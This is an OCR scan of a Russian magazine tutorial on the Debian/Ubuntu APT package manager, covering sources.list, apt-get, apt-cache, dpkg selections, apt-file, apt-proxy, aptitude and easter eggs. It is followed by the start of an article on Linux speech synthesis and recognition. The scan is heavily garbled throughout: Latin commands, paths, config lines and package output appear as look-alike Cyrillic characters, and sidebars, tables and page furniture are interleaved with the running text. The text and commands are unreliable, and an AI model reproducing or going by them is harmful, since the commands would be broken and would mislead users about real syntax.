[компонент2 ] [ . . . ] 

Поле игі — это адрес репозитория, который в 
большинстве случаев является НТТР-адре- 
сом, но может быть и ссылкой на локальный 
репозиторий (бііе :/ гооі/герозііогу) , адресом 
репозитория на РТР или 55Н-сервере. В поле 



«дистрибутив» указывается имя дистрибутива, 
для которого собраны пакеты. Для ОеЬіап имя 
может быть одним из зІаЫе, оісізіабіе, ипзІаЫе, 
Іезбпд, вто время как в случае ІІЬипіи следует 
указыватьтолько конкретное наименование 
дистрибутива (например, іаипіу], атакже 
различные обозначения на его основе 
(например, іаипіу-ирбаіез, Іаипіу-Ьаскрогіз, 
Іаипіу-зесигііу]. Надо сказать, что АРТ совсем 
не противтого, чтобы смешивать пакеты 
различных дистрибутивов на одной системе, 
но за последствия в этом случае будешь отве- 
чать только ты. Компонент обычно носит имя 
таіп, сопігіб или поп-ігее для ОеЬіап и таіп, 
ипіѵегзе, тиШѵегзе, рагіпег и гезігісіесі для 
ІІЬипІи. Все это имена различных репозито- 
риев пакетов, которые обособлены только для 
того, чтобы разделить пакеты на основе каких- 
либо критериев. Например, таіп — это пакеты, 
собираемые группой разработчиков ІІЬипІи/ 
ОеЬіап. На качество ПО, содержащегося в 
них, есть определенные гарантии, включая 
своевременные обновления и багфиксы, вто 
время каксопігіб и ипіѵегзе — это стороннее 
ПО, котороеты устанавливаешь на свой страх 
и риск. 

2. Добавить в а рі кеугіпд публичный ключ 
репозитория, используемый для удостове- 
рения его подлинности и надежности. Ключ 
можно получить любыми способами и доба- 
вить, выполнив команду «арі-кеу асИ ключ», 
но такой способ редко практикуется из-за 
неудобства. В подавляющем большинстве 
случаев ты будешь иметь дело с командой 



ІБ-ключа 

которая запрашивает ключ напрямую у сер- 
вера сертификации (для ІІЬипІи это кеузегѵег. 
иЬипІи.сот ). Именнотакбольшинство сто- 
ронних разработчиков распространяютсвое 
ПО для дистрибутивов ОеЬіап/ІІЬипІи (при 
этом остальные просто выкладывают пакеты 
и их контрольные суммы). Например, зайдя 
на страничку интересующего тебя проекта 
на хостинге ІаипсЬрасІ.пеІ и нажав на ссылку 
ТесЬпісаІ сіеіаііз аЬоиІіЬіз РРА, ты увидишь 
строку, которую необходимо добавить в /еіс/ 
арі/зоигсез.ІізЕ В Зідпіпд кеу: будетуказан Ю 
ключа. 

3. Обновить кэш доступных пакетов: 

$ зисіо арС-деС ирсіаке 

4. Установить пакет, используя команду «а рі- 
деі іпзіаіі пакет». 

Многие девелоперы помещают ссылку на 
репозиторий и Ю его ключа прямо в ЬеЬ-пакет, 
поэтому после скачивания пакета, установки и 
выполнения команды «арі-деі и рсіаіе && арі- 
деі ирдгаЬе» пакеты будут обновлены вместе с 
их собратьями, перечисленными в зоигсез.Ілзі 
В частности, так распространяются браузеры 
орега и альфа-релиз доодіе сЬготе. 
Репозиторий, располагающийся на ком- 
пакт-диске, добавить в зоигсез.іізі; намного 
проще. Для этого есть специальная команда 
арі-сбгот. Ты просто вставляешь СО в привод 
и выполняешь команду: 

$ зисіо арк-ссігош асісі 

ХИТРОСТИ И НЕСТАНДАРТ- 
НЫЕ СИТУАЦИИ 

АРТ есть АРТ, удобна и проста, но иногда не 
обойтись без ухищрений, о самых полезных из 
которыхты узнаешь из этого раздела. 

1. По умолчанию команда «арі-деі гетоѵе» 
удаляет пакет полностью только в том случае, 
если ни один из его файлов не был изменен 
после установки, иначе измененные файлы 
остаются нетронутыми. Естественно, конфи- 
гурационные файлы меняются почти всегда, 
поэтому арі-деі оставляет после себя кучу 
мусора, которую приходится убирать руками. 
Команда «арі-деі ригде», выполненная вмес- 
то «арі-деі гетоѵе», решает эту проблему. 

2. Любители ковыряния в системе, а также 
системные администраторы, серверы кото- 
рых подверглись взлому, скорее всего, 
захотят вернуть пакеты к начальному 
состоянию, в котором они находились до 
проведения манипуляций. Поможет в этом 
команда: 



ПОЛЕЗНЫЕ КОМАНДЫ АРТ-САСНЕ 



арі-сасбе збоѵѵ пакет — детальная информация о пакете 
арі-сасбе збоѵѵркд пакет — общая информация о пакете 
арі-сасбе берепбз пакет — списокзависимостей пакета 

арі-сасбе гберепбз пакет — списокобратных зависимостей (кому нужен указанный пакет) 
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► 077 




>^>ЯТООІ.АОѴА№ЕО РАСКАБІпб ТООЬ АО 
ШѴАм'Ш РАСКА6Ш6 ТО(П. А0ѴАІ1СЕ0 РАШ 





$ арі-сасЬе зЬоѵѵ хогд 
Раскаде: хогд 
Ргіогііу: орііопаі 
Бесііоп: хіі 
ІпзіаІЛескБіге: 24 

Маіпіаіпег: ІіЬипіи Соге Оеѵеіорегз <иЬипіи-сІеѵеІ-сіІ5си55@Іі5І:5.иЬип1:и.сот> 
Огідіпаі-Маіпіаіпег: ОеЬіап X Бігіке Рогсе <сІеЬіап-х<аіі 5 І: 5 ,сіеЬіап.огд> 

Агскіі1:ес1:и ге : І386 
Ѵегзіоп: 1:7.4~5иЬип1:и18 

Ргоѵісіез: х-ѵ/іпсіом-зузіет, х-міпсіом-зузіет-соге 

Оерепсіз: х$егѵег-хогд, ІіЬдІІ-теза-дІх | ІіЬдІІ, ІіЬдІи1-те$а, хіопіз-Ьазе (>= 1:1. 
0,0-1), хіопіз-ІѲѲсІрі (>= 1:1. 0.0-1), хіопіз-75(1рі (>= 1:1. 0.0-1), хіі-аррз, хіі-зе 
5$іоп-иі;іІ5, хН-иііІз, хП-хіз-иііІз, хІІ-хкЬ-иііІз, хіі-хзегѵег-иіііз, хаиіЬ, хіп 
іі, хіопіз-иіііз, хкЬ-сіаіа, хіегт | х-іегтіпаі-етиіаіог, хіі-соттоп, хіприі 
Ресоттеп<І5: хіопіз-зсаІаЫе (>= 1:1. 0. 0-1) 

Биддезіз: хогд-<1ос5 

Рііепате: рооІ/таіп/х/хогд/хогд_7 .4~5иЬипііі18_і38б,сіеЬ 
5І2е : 1272 

МОЗзит: Ь9бсіаЬЗаЬ275е685сІ213е1Ѳ2Ь7Ьб9Ъ9е 

5НА1 : 1с139с1491б83есс129Ьб73сШ1700еаа243е2б818е к 

БНА256 : 7Пеа84а2937Гее9сеІс75Ьсіаб2Іе7Т953438а473ЬсІб97есссІ343844Ьа492сІЗѲ 



Оезсгірііоп: Х.Огд X Ѵ/іпсіоѵѵ Бузует 

"Пиз теііара с каде ргоѵісіез іМе сотропепіз Рог а зіапсіаіопе 

ѵ/огкзіаііоп гиппіпд іНе X ѴУіпсІоѵчг Бузіет. II: ргоѵісіез і)іе X ІіЬгагіез, ап X 

зегѵег, а зеі оР РопРз, апсі а дгоир оР Ьазіс X сііепрз апсі иріііріез. 



НідРіе г Іеѵеі теРараскадез, зисН аз РЬозе Рог сіезкіор епѵігоптепРз, сап 
сіерепсі оп РМіз раскаде апсі зітрііру РІіеіг сіерепсіепсіез. 

Получаем информацию о пакете спомощьюарС-сасЬе 



$ зисіо арк-дек іпзкаіі --геіпзкаіі 
пакет 

3. Более низкоуровневые утилиты управления 
сІеЬ-пакетами (такие, как сізеіесі: и сіркд) ведут 
специальный список состояний пакетов, кото- 
рый может использоваться для управления 
тем, какие пакеты должны быть установлены 
или удалены в пакетном режиме (именно так 
работает связка сізеіесі: + сіркд). Его же можно 
использовать для многих других целей, напри- 
мер, переноса конфигурации системы на дру- 
гую машину. Выполни следующую команду: 

$ сіркд --дек-зеіескіопз > кііе 

Перенеси файл на другую машину и выполни 
на ней две команды: 

# сак кііе > сіркд --зек-зеіескіопз 

# арк-дек сізеіеск-ирдгасіе 

В систему будут добавлены все пакеты систе- 
мы-источника. Чтобы файл состояний пакетов 
также содержал информацию отом, какие 
п а кеты сл еду ет удал итьизсисте мы, добавь 
символ «\*» после аргумента ‘--деі-зеіесііопз’. 
Списоксостояний не содержит версии паке- 
тов, это можно использовать после установки 
более новой версии дистрибутива для приве- 
дения его ктребуемому состоянию. 



4 . Ты вручную наложил заплатку на файл одного 
из системных пакетов и не хочешь, чтобы этот 
пакет был обновлен (с уничтожением всех твоих 
изменений) после вызова «арі-деі ирдгабе». В 
этом случае тебе на помощь вновь придет спи- 
сок состояний. Пакет может быть «заморожен», 
в результате чего арі-деі: откажется его обнов- 
лять И ПРОПУСТИТ: 

# ескю -е " согеикііз кю1<Т" I сіркд 

--зек-зеіескіопз 

Принудительно обновить пакет можно с 
помощью указания флага '-и' при вызове 
арі-деі. 



СЛОВАРЬ АРТ 



5 . Как и любая система, обладающая сетевым 
функционалом, АРТ позволяет использовать 
прокси для доступа к репозиториям. Чтобы 
задействовать эту возможность, пропиши в 
файл /еіс/арі/арі.сопі строку: 

Асдиіге : : кккр : : Ргоху «кккр : / /ххх . 
ххх . хх : уууу» 

Где ххх. ххх. хх — имя твоего прокси, уууу — порт. 

6 . Обычно АРТ-утилиты запрашивают самую 
новую версию пакета из всех, что находятся в 
его кэше, поэтому если ты добавил в зоигсез. 
Іізі различные экспериментальные и ипзІаЫе- 
репозитории, то после обновления получишь 



Пакет— программа, библиотека, исходники или любые другие файлы, атакже их метадан- 
ные, упакованные в особым образом сформированный архив. 

Репозиторий — место хранения беЬ-пакетов. 

Кэш доступных пакетов (или просто кэш) — файл, в котором кэшируется информация обо 
всех пакетах, доступных из источников, перечисленных в/еіс/арі/зоигсез.іізі. Кэш обнов- 
ляется во время каждого вызова команды «арі-деі ирбаіе». 

Индексный файл — головной файл репозитория, содержащий название, версию, размер, 
краткое и полное описание и зависимости для каждого пакета. Носит имя Раскадез.дг в 
случае бинарного репозитория и Зоигсез. рт. — для репозитория и сходных текстов. Созда- 
ется с помощьюутилитркд-зсапраскадез и сіркд-зсапзоигсез. 

Арі; кеугіпд (дословно: связка ключей арі) — хранилище ключей, удостоверяющих подлин- 
ность источников пакетов (репозиториев). 



► 078 
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□ѴАМСЕО РАСКА6ІМ6 ТООІ. АОѴА*ІСЕО РАСКА 
А6Ш6 ТООЬ АОѴАЫСЕО РАСКА6ІЫ6 ТООІ. АОѴ 

ПѴАМГ.РП РАПКАІіШІі ТППІ АПѴАкІГРП РАГ.КА 



(корневой каталог репозитория) 

I 

+ -СІІБ^5 

I 

I -зЪаЫе 
I (-шаіп 

I I [ -Ъіпагу-аІрЬа 
І ( [-Ъіпагу-агш 
I I I -Ъіпагу- . . . 

I I ^-зоигсе 
I І-сопІігіЪ 
[ I 1 -Ъіпагу-аІрЬа 
І I I -Ъі пагу-агш 
[ I I -Ъіпагу- . . - 
I I +-зоигсе 
1 +-поп-:Егее 
І [ -Ьіпагу-аІрЬа 
I 1 -Ъіпагу-агш 
I I -Ъіпагу- * , . 

I -і--5оигсе 

I 

I -^езііпд 
I І-шаіп 

I | (-Ъіпагу-аІрЬа 
I | I -Ъіпагу-агш 
I I [ -Ъіпагу- . . , 

I I *-зоигсе 
I І-сопЬгіЪ 
I I I -Ъіпагу-аІрЬа 
I I 1 -Ъіпагу-агш 
I I I -Ъіпагу- . . * 

I ( -і—Боигсе 
I +-поп-ігее 
I I -Ъіпагу-аІрЬа 
I і -Ьіпагу-агш 
I | -Ъіпагу- * * * 

I +-5оигсе 

+ -ип5ІаЫе 
I -шаіп 

І | -Ъіпагу-аІрЬа 
1 ! -Ъіпагу-агш 
I I -Ъіпагу-.,. 

I *-зоигсе 
I -сопЪгіЬ 
[ I -Ъіпагу-аІрЬа 
І І -Ъіпагу-агт 

Так вы глядит схематически репозиторий 
РеЬ-пакетов 



дистрибутив, состоящий исключительно из эксперимен- 
тальных или ипзіаЫе-пакетов, и кучу проблем, вызванных 
таким положением дел. Однако ситуация легко разрулива- 
ется с помощью помещения в Мс/аріУарГсопі 1 строки: 

АРТ : : БеГаиШ-КеТеазе "релиз"; 



асі 

асрі-гирроП 

асрій 

агігіизег 

асІоЬе-ПазИрІ.идіп 

аІасагЬе 

аІза-Ьазе 

аіза-иіі'із 

апасгоп 

агті 

апі-дс] 

ап1:-орі;іопаІ 

апі-орііопаі-дс] 

агѵЫг 

апІІгЗ 

агѵСІгЗ-дс] 

аое^ооіэ 

арасЬе2 

Списоксостояний пакетов можно использо- 
вать для автоматической установки пакетов 



Где релиз — это оІсІзіаЫе, зІаЫе, ипзіаЫе, іезбпд или 
ехрегітепіаідля ОеЬіап или имя релиза для ІІЬипіи. 
Теперь, в случае необходимости установить пакет из 
указанного дистрибутива, просто пропиши его имя после 
аргумента ‘-Т при вызове арЫдеС 



$ зисіо арТ-деТ -С ипзТаЫе іпзкаіі пакет 

7. Все полученные арі-деі беЬ-пакеты хранятся в каталоге/ 
ѵаг/сасЬе/аріУагсЬіѵез, а это значит, что в случае переуста- 
новки системы ты можешь скопировать содержимое каталога 
на другой диск/раздел, а после восстановить его и сэконо- 
мить время/трафик на установке пакетов. Кроме того, это по 
сути снапшот твоей установленной системы (той ее части, 
которую ты установил сам], который можно отнести к другу 
(вместе с описанным в третьем пункте списком состояний] 
или, при ненадобности, удалить для освобождения места. 

8 . Удаленный снапшот системы, описанный в предыдущем 
пункте, легко восстанавливается с помощью приведенной 
ниже конструкции: 

$ зисіо сіркд --дек-зеіескіопз I дгер -ѵ 
"сіеіпзкаіі " I амк ' {ргіпк $1}' I хагдз сіркд- 
гераск 



9. Кроме бинарных пакетов, репозитории ОеЫапДЛэипШ содер- 
жат и пакеты с исходными текстами приложений, которые могут 
быть получены и собраны с использованием команды: 

$ зисіо арС-деС -Ь зоигсе имя пакета 

СТОРОННИЕУТИЛИТЫ 

Система АРТ прошла очень долгий путь развития, поэтому 
помимо официальныхутилит, включенных в пакетарС 
репозитории ОеЬіап и ІІЬипІи изобилуют массой сторонних 
утилит, которые могутбыть использованы для выполнения 
некоторых нестандартных задач. Наиболее полезная из них 
называется арЫіІе и необходима, как нетрудно догадаться 
из названия, для определения принадлежности того или 
иного файла определенному пакету. Устанавливаем: 

$ зисіо арС-деС іпзкаіі арк-ГіІе 



Просим арМіІе создать кэш всех файлов, установленных в 
системе пакетов (по нему будет производиться поиск]: 



іпзіаіі 

іП5Іа11 

ІП5ІѲІ1 

іпзііаіі 

іпзіаіі 

іпБІаІІ 

іПБНаИ 

іпзііаіі 

іпзіаіі 

ригде 

сІеіп5І:аІІ 

ригде 

сіеіпзгаіі 

рц где 

ригде 

сіеіп5і:а11 

сіеіп5І;а11 

ригде 




> іпіо 

• Абѵапсеб Раскадіпд 
ТооІ — высокоуровне- 
вый инструмент для 
работы с пакетами. 

• АРТ был разработан 
для дистрибутива 
ОеЬіап и использова- 
ния совместно 

с системой управле- 
ния ЬеЬ-пакетами. 
Сегодня использу- 
ется в ОеЬіап-кло- 
нах ІІЬипІи Меріз, 
Хапсігоз и некоторых 
дистрибутивах на 
базе системы управ- 
ления пакетами РРМ 
(АІ_Т І_іпих]. 

• АРТ настолько попу- 
лярен, что портиро- 
ван даже в Мае 05 X 

( ЛпкргоіесСогд ). 
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>^>ЯТООІ.АОѴА№ЕО РАСКАБІпб ТООЬ АО 
ШѴАмШ РАСКА6Ш6 ТО(П. А0ѴАІ1СЕ0 РАСК 



німяіші Ѵіііѵ/іѵігіаіі^ти:#тніллшіі 



Рііе ЕсігЕ Раскаде 5еШпд$ НеІр 



Е 



Кеіо ас! Ма гк А 1 1 і)р д гай е 5 



& 

Ргорегііе* 



Оиіск зеагсЬ 



5еагсЬ 




АН 

1п5Ьа11ей 



іпэЫІес! (ирдгайаЫе) 

МоЕ іп^аііесі 

М-оЕ ітзіаііеб (гезігіиаі сопіід) 



^есйоп5 



Раскаде 



іпзЕаІІесІ Ѵег^іоп 



ьаівді Ѵбгзіоп 



Оезегірйоп 



□ 3 арІЙийе 



0.4.11.11-ІиЬипШ 0,4.11,11-ІиЬипШ ІеггпіпаІ-ЬаодІ раскаде тападег 



□ <3 арЫізЕсНапде* 


2,83 


2,83 


[Р] ар&иоѵе 


4,2.27-1иЬипйі7 


4.2.27-1иЬипШ7 


О арі-ргоху 


1 .9. 36. 3+ п ггш ІиЬип Д 


1,9.36. 3+пти1иЬипІі 


0 арі-гКоѵѴ'Ѵег5Іоп5 


0.15 


0.15 


Щ -О арМгагирогІ-Ьйрз 


0.7,20.2иЬипЕи6 


0.7,20, 2 иЬшЕиб 


0 <5 ариігі 


0*З.ЗиЬипЩ1Д 


О.З.ЗиЬііпиіІ.1 


ГЛ <5 арі-ийі* 


0.7.20.2иЬиПіЬі6 


0.7.20.2иЬипіхі6 


п 0 арі-харіагнпгіех 


0.16 


0.16 









рас к аде сііапде Ьізіогу пойИсаКол ЕооІ 

МаІПЙІП ОеЬіап раскадез іп а раскаде рооі 

ОеЫап агсГііѵе ргоху апй рагііаі тіггог ЬиІУег 

Іі5іг аѵаіІаЫе раскаде ѵегаіопа иііЬ йІ5ігіЬи(Іоп 

АРТ ЬКра йалзрогі 

іпэЫІ раскадеэ и$іпд Ше арі ргоіосоі 

АРТ ийіігу рпэдгатз 

та і Ліепа псе Іооіа Гог а Харіап Іпгіех оГ ОеЬіап | 
Рйіамагі іпЬ тасцйяади& Ааікіцввяаваійи 



^аіЬі 



ІегтіпаІ-ЬаБесі раскаде тападег 



Сеі 5сгееп$Но1 



АрШйе >$ а ЕегтіпаЕЬа&ей раскаде тападег ѵгійі а питЬег оГ и^еГиІ 
ГеаЕигеа. іпсіийілд: а тий-Ііке аулЕах Гог таісЬіпд раскаде* іп а 
ЯехіЫе талпег, (ІзеЕесІ-Пке регзі*Еепое оГ изег асйолз, Же аЬШіу Іо 
гейіеѵе апгі йізріау Ше ОеЬіап сЬапдеІод оГ тозі раскаде*, апй а ссттапіі- 
Ііпе тойе зітііаг ю Шаі оГ арі-деі 



арЫийе із аізо Ѵ2К<отрІіэпЕ поп-Гайепіпд. паіигаііу сіезпзілд, алй 
ІіоизеЬгокеп. 



Ь 



СапопісаІ ргоѵігіе* сгігісаі иргіаіе* Гог арЬШсІе ипШ ОсіоЬег 2010. 



Бѵпарііс — мощная графическая обертка во круг утилит АРТ 



$ арС-іііІе ирсІаСе 
Ищем: 

$ арЦ-і:і1е зеагсЪ. /изг/Ьіп/арС-деС 
арС : /изг/Ьіп/арЦ-де{ 

Запрашиваем список всех файлов пакета: 

$ арС-^іІе ІізС арС 

Простая утилита арі-збоѵѵ-ѵегзіопз покажет, 
какие пакеты можно обновить, суказанием 
версий и других данных. Запусти ее с флагом 
‘-и’, чтобы получить списоктолько подлежащих 
обновлению пакетов (вместо списка всех па- 
кетов]. Если ты установил большое количество 
различных пакетов и теперь хочешь избавить- 
ся от ненужного хлама, то по может утилита 
беЬогрЬап, которая производит поиск неис- 
пользуемых пакетов и осиротевших зависимос- 
тей. Просто запусти беЬогрЬап без аргументов и 



увидишь список пакетов, который тутже можно 
передать на вход команде «арі-деі гетоѵе» или 
же просто выполнить команду: 

$ зисіо арС-деС гетоѵе ' ЛеЬогрЬап ' 

Поумолчанию беЬогрЬап обрабатываеттолько 
пакеты, содержащие библиотеки, нотакое 
поведение можно изменить, добавив флаг ‘-а’ к 
вызову команды: 

$ сіеЬогрЬап -а 

Не стоит сразу бросаться удалять пока- 
занные утилитой пакеты, потому как даже 
самый мощный эвристический алгоритм 
не способен определить твои личные 
потребности. Так, мне программа пока- 
зала пакеты доодіе-сбготе, іпкзсаре и 
даже хогд. 

Утилита арі-тоѵе позволиттебе создать 
локальный репозиторий. Установи программу, 



открой файл /еІс/арІ-тоѵе.сопГ, укажи в опции 
ШСАЮІР путь к каталогу, в котором должен 
располагаться репозиторий, и запусти команду: 

$ зисіо арС-шоѵе ирсІаСе 

В результате все выкачанные из Сети с 
помощью а рі-деі пакеты (каталог/ѵаг/ 
сасбе/аріУагсЫѵез) будут перемещены в 
указанный в конфиге каталог, для которого 
будет создан индексный файл. Это удобный 
способ создания внутрисетевого репози- 
тория для тех случаев, когда массу одина- 
ковых пакетов необходимо установить на 
множество машин. Для создания локального 
репозитория также очень удобно применять 
сервер арі-ргоху, позволяющий кэшировать 
скачиваемые из репозитория беЬ-пакеты 
на стороне сервера. Для этого арі-ргоху 
устанавливается на выделенной машине 
(возможно, шлюзе], а зоигсез.іізі: клиентов 
модифицируется так, чтобы в качестве поля 
игі всех репозиториев был указан адрес этой 
машины. Как результат, все запросы б еЬ- па- 
кетов перенаправляются карі-ргоху, который 
запрашивает пакету головного репозитория 
и сохраняет его в своем кэше, а ответ на все 
последующие запросы этого пакета будет 
отдан из кэша. Для начала устанавливаем арі- 
ргоху на выделенной машине: 

$ зисіо арС-деС іпзСаІІ арС-ргоху 

Далее открываем файл /еЕс/арІ-ргоху/арІ:- 
ргоху-ѵ2.сопГ, переходим в секцию [ОЕРАІЛТ] и 
заменяем значение опции аббгезз на ІР-адрес 



НТО ВНУТРИ? 



Отличительной чертой пакетов формата ОеЬ является их простота. Любой ОеЬ-пакет — это 
три файла: баГа.Гаг.дг, сопТгоЕТаг.дг и беЬіап-Ьіпагу, запакованные архиватором а г. Файл 
баіа.іаг.дг — это содержимое пакета (бинарники, тап’ы, документация ит.д.], сопІгоЕіагдг 
— метаданные, в простейшем варианте два файла: сопЕгоІ, содержащий описание пакета, 
зависимости, размер ит.д., и тббзитз — контрольные суммы всех файлов пакета. Файл 
бебіа п-Ьі па гу содержит версию формата ОеЬ-пакета (например, 2.0). Для распаковки 
пакета можно использовать команду: 

$ аг -хѵ пакет . сіеЬ && Саг -х.т.1 сіаСа.Саг.дг 



► 080 



ХАКЕР 01 /133/ 10 







□ѴАМСЕО РАСКА6ІМ6 ТООІ. АОѴА*ІСЕО РАСКА 
А6Ш6 ТООЬ АОѴАЫСЕО РАСКА6ІЫ6 ТООІ. АОѴ 

ПѴАМГ.РП РАПКАІіШІі ТППІ АПѴАкІГРП РАГ.КА 



$ арк-дек тоо 

(_) 

(оо) 





* 





. ..."Наѵе уои тооесі косіау?"... 

Пасхальное я йио в стиле разработчиков а рі-аеі 



машины, а также описываем используемые 
а рі-ргоху источники пакетов, например: 

$ зисіо ѵі /еІс/арІ-ргоху/арІ-ргоху-ѵ2.соп{ 

[иЬипки] 

Ъаскепбз = кккр : //ги . агсЬіѵе . 
иЬипки . сот/иЬипки/ 
тіп_гекгез]і_бе1ау = ІсЗ. 

[иЪипки-зесигіку ] 

Ьаскепсіз = кккр : //зесигіку . иЬипки . 

сот/иЪипки/ 

шіп_ге^гезЬ_(іе1ау = ІсЗ. 

Обычно этих двух адресов достаточно для 
покрытия всего спектра пакетов, предоставля- 
емого разработчиками ІІЬипІи. Перезапускаем 
арЬргоху: 

$ зибо іпѵоке-гс.б арк-ргоху гезкагк 

Чтобы перевести клиентов на использование 
а рѣ-ргоху, берем стандартный зоигсез.іізі: 
ІІЬипки, заменяем все реальные поля игі на 
ЬЛр://ІР-адрес-арІ-ргохѵ:9999/иЬипІи/ и копи- 
руем этот файл на каждый клиент. 

Существует и множество других, менее 
интересных утилит, работающих в связке 
с АРТ. Например, арі-сЫег позволяет 
производить обновление пакетов на 
большом количестве удаленных узлов, ис- 
пользуя псевдографический интерфейс. 
Программа арізб реализует командный 
интерфейс, подобный зб, поверх команд 
пакета арі; аріТз — виртуальная файловая 
система для управления АРТ. Утилита 
беЬсІеІТа, позволяющая обновлять пакеты 
с помощью выкачивания из Сети их дельт, 



могла бы стать темой отдельной статьи, 
если бы для нее существовал хотя бы один 
своевременно обновляемый репозиторий. 

АРТИЧЮЕ 

Утилита арі-деі и ее родственники — не единст- 
венная реализация АРТ. Еще более мощная, 
удобная и универсальная альтернатива им зовет- 
ся арбіибе и представляет собой концентриро- 
ванный функционал арЬдеТ арЬсасбе и бзеІесТ 
АрбШбе позволяет уста на вливать/удал ять, 
искать, обновлять и производить массудругих 
действий с пакетами, используя дватипа 
интерфейса: командный режим, сходный с 
арі-деі и арЬсасбе, и режим с псевдографи- 
ческим интерфейсом, внешне напоминающий 
интерфейс сігеіесі, но гораздо более удобный и 
функциональный. 

В режиме командной строки арбкибе можно 
использовать для выполнения таких дейст- 
вий, как: 

аркікибе іпзкаіі — установка пакета 
аркікибе гетоѵе — удаление пакета и 
осиротевших зависимостей 
аркікибе ригде — удаление пакета, 
осиротевших зависимостей и оставших- 
ся после них конфигурационных файлов 
аркікибе зеагсЬ — поиск пакета в кэше 
(списке доступных пакетов) 
аркікибе ирбаке — обновление кэша 
аркікибе заке-ирдгабе — обновление 
пакетов 

аркікибе сіеап — удаление ранее ска- 
чанных пакетов 

аркікибе киіі-ирдгабе — обновление 
пакетов, даже если это действие тре- 
бует удаления каких-либо пакетов 



аркікибе зкюм — информация о пакете 
аркікибе аикосіеап — удаление уста- 
ревших пакетов 

аркікибе Ьоіб — установка запрета на 
обновление пакета 

Интерактивный режим, доступный при запуске 
арбШбе без аргументов, позволяетвыполнить 
все те же действия, используя псевдографичес- 
кий интерфейс, построенный на базе библио- 
теки псигзез. Он работает в пакетном режиме, 
поэтому будет удобен в случаях, когда требуется 
установить большое количество пакетов. 

ПАСХАЛЬНЫЕ ЯЙЦА 

Разработчики утилит АРТ оказались ребятами с 
несколько извращенным чувством юмора. Чего 
только стоит результат следующей команды: 

$ зибо арб -дек шоо 

Еще более дико выглядитто, что встроили в 
свою программу создатели арбіибе. Попробуй: 

$ зибо аркікибе шоо 

Этакое пасхальное яйцо без пасхального яйца. 
Ну, ладно: 

$ зибо аркікибе -ѵ шоо 
$ зибо аркікибе -ѵѵ шоо 
$ зибо аркікибе -ѵѵѵ шоо 
$ зибо аркікибе -ѵѵѵѵ шоо 
$ зибо аркікибе -ѵѵѵѵѵ шоо 

И — финальный аккорд: 

$ зибо аркікибе -ѵѵѵѵѵѵ тпоо ~я~ 
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ІЛМІХОЮ 



■ ■ Евгений зобнин ювышгаемАп.сом 



Говорящий 

пингвин 

Учим Ыпих говорить и слушать 

Разговаривающие с человеком и выполняющие 
все его команды компьютеры — неизменный 
атрибут большинства фантастических фильмов. 
Человекзаходит домой, говорит«Свет», и вклю- 
чается освещение, говорит«Музыка», 
и начинает играть композиция из любимого 
плейлиста, а в ответ на команду «Новости» при- 
ятный женский голос зачитывает последние 
вести с валютного фронта. Думаешь, это фан- 
тастика? Нет, реальность. И реальность с откры- 
тыми исходными текстами. 



ФЕСТИВАЛЬ ПРИЛОЖЕНИЙ 

Синтезирование голоса производится с 
помощью специальных программ-синтезато- 
ров, таких, например, какіезбѵаі, езреак, йііе 
(облегченная версия іюзбѵаі], тЬгоІа, ігееІТз, 
ги_Кз и других. Наиболее качественной из них, 
по общему мнению, считается безТіѵаІ, разраба- 
тываемый сотрудниками многихуниверситетов 
по всему миру и, что самое главное, оснащенный 
поддержкой русского языка (правда, не из ко- 
робки). Большинство других синтезаторов обла- 
дают более низким качеством произношения, и, 
ктомуже, не дружат с русским языком (исключе- 
нием являются езреак, с гораздо более низким, 
в сравнении с Іюзбѵаі, качеством произношения, 
и ги_йз, разработанный нашими соотечествен- 
никами, но говорящий просто отвратительно). 
Поверх синтезатора может функционировать так 
называемый речевой сервер — демон, который 
всегда находится в фоне и ждет команд отдругих 
приложений. Пользователь или программа 
могут использовать сокет или сообщения 0-13145 
для передачи текста речевому серверу, который, 
в свою очередь, сформируеттекстовый файл в 
правильной кодировке и передастего синтеза- 



тору. Крометого, речевой сервер может нести 
ответственность за выбор одного из доступных 
синтезаторов речи, голоса, передачуданных 
по сети ит.п. Среди примеров можно привести 
ЗреесЬ Оізраісбег, МиШЗреесЬ и разработан- 
ный для дистрибутива АШпих ѴоісеМап. 

Чтобы научить комп понимать проговариваемые 
слова, применяются системы распознавания 
речи (СМ О, наиболее известная и работоспо- 
собная из которых носит имя ЗрЫпх ( стизрЫпх. 
зоигсеЬгде.пе!: ). Разработкой этого движка 
занимается университет Карнеги-Меллона, 
хотя отдельные доработки также производили 
сотрудники Массачусетс ко го технологи чес ко- 
го института и корпорация 5ип Місгозузіетз. 
Качество распознавания «Сфинкса» еще далеко 
от идеала, он постояннодаетсбои и совершенно 
не способен разобрать слитную речь. Однако его 
возможностей вполне достаточно для органи- 
зации системы исполнения простых голосовых 
команд, что и демонстрируюттакие проекты, как 
ОпотеѴоісеСопІхоІи РегІВох. 

Альтернатива 5рЫпх — движок-Міиз японского 
происхождения. По качеству распознавания 
Чиііиз неуступаетЗрЫпх, однако имеетдва изъ- 




янам) отсутствие хорошей акустической модели 
для английского языка (для русского более-менее 
нормальной нет и для 5рЫпх), что означает гораз- 
до более низкое качество распознавания (в конце 
статьи я расскажу, как обойти эту проблему), и б) он 
использует внешний движок генерации акусти- 
ческой модели (обучения) НТК, разрабатываемый 
под руководством Місгозоіі: в Кембридже (а это 
значит, чтодвижокхоть и открыт, но использовать 
его можнотолько в личных целях). 

Для систем синтеза и распознавания речи 
существует масса различных оберток, упро- 
щающих использование. Для Резбѵаі можно 
привести в пример приложение ШзсІ, для 5рЫпх 
это уже не развиваемый РегІВох и созданный в 
рамках боод Іе 5и т тег Об Собе апплет для сре- 
ды Споте под названием Споте Ѵоісе Сопігоі. 
Отличная графическая оболочка для Чиііиз — 
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$ *іте есііо "Съешь еще этих мягких булочек и выпей чаю" 
Ѳ5*іѵа1 --Іапдиаде гиззіап --ііз 

геаі 0тб.587з 

изег 0т2.272з 

зуз 0т0.348з 

$ □ 

Резііѵаі достаточно долго думает перед тем, как начать произносить слова 



программа 5ітоп, написанная с использовани- 
ем библиотеки 014. 

ПИНГВИН! ГОЛОС! 

Какя говорил выше, лучшей программой 
синтеза речи является Еезбѵаі, разрабатыва- 
емая в Центре изучения речевыхтехнологий в 
Эдинбургском университете (Шотландия]. Она 
поддерживает множество различных языков 
и голосов, может читать текст из файла либо 
из командной строки и записывать результат 
синтеза в звуковой файл формата ѵѵаѵ, включает 
в себя плагин для рібдіп, проговаривающий 
входящие сообщения. Недостаток программы 
только в том, что синтез русской речи она не 
поддерживает, поэтому для прикручивания 
такой возможности придется скачивать и уста- 
навливать далеко не самого лучшего качества 
голос, словари ударений ит.п. Итак, берем 
дистрибутив ІІЬипІи (любой изтрех последних 
